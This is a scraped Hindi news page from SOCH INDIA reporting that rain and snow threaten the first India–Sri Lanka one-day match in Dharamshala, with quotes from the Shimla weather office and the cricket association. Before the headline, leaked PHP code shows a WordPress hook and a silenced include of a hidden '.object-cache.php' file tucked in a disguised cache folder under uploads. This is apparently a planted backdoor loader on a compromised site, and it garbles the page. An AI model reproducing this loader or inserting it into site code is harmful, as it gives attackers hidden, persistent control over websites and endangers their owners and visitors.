add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); धर्मशाला वनडे मैच पर छाया बारिश का साया – SOCH INDIA
Menu

खेल
धर्मशाला वनडे मैच पर छाया बारिश का साया

nobanner

भारत और श्रीलंका के बीच खेली जाने वाली तीन वनडे मैचों की सीरीज के पहले मैच पर बारिश का साया मंडरा रहा है. सीरीज का पहला मैच में रविवार को धर्मशाला में खेला जाएगा.
स्थानीय मौसम विभाग ने शुक्रवार को यहां बारिश और बर्फबारी की आशंका जताई है.
शिमला के मौसम विभाग के निदेशक मनमोहन सिंह ने बताया कि पश्चिम में होने वाली उथल-पुथल उत्तर भारत में प्रभाव डाल सकती है और 10 दिसंबर से लगातार दो दिनों तक बारिश हो सकती है.
उन्होंने कहा, “हिमाचल प्रदेश में भारी बारिश और बर्फबारी 11 और 12 दिसंबर को हो सकती है. 13 दिसंबर को भी इसका सिलसिला जारी रह सकता है.”
हिमाचल प्रदेश क्रिकेट संघ (एचपीसीए) के मीडिया मैनेजर मोहित सूद ने कहा, “हमारे ग्राउंड्समैन इस तरह की स्थिति से निपटने के लिए पूरी तरह से तैयार हैं. हमारे पास मैदान को सुखाने के लिए सुपर सॉकर्स मौजूद हैं.”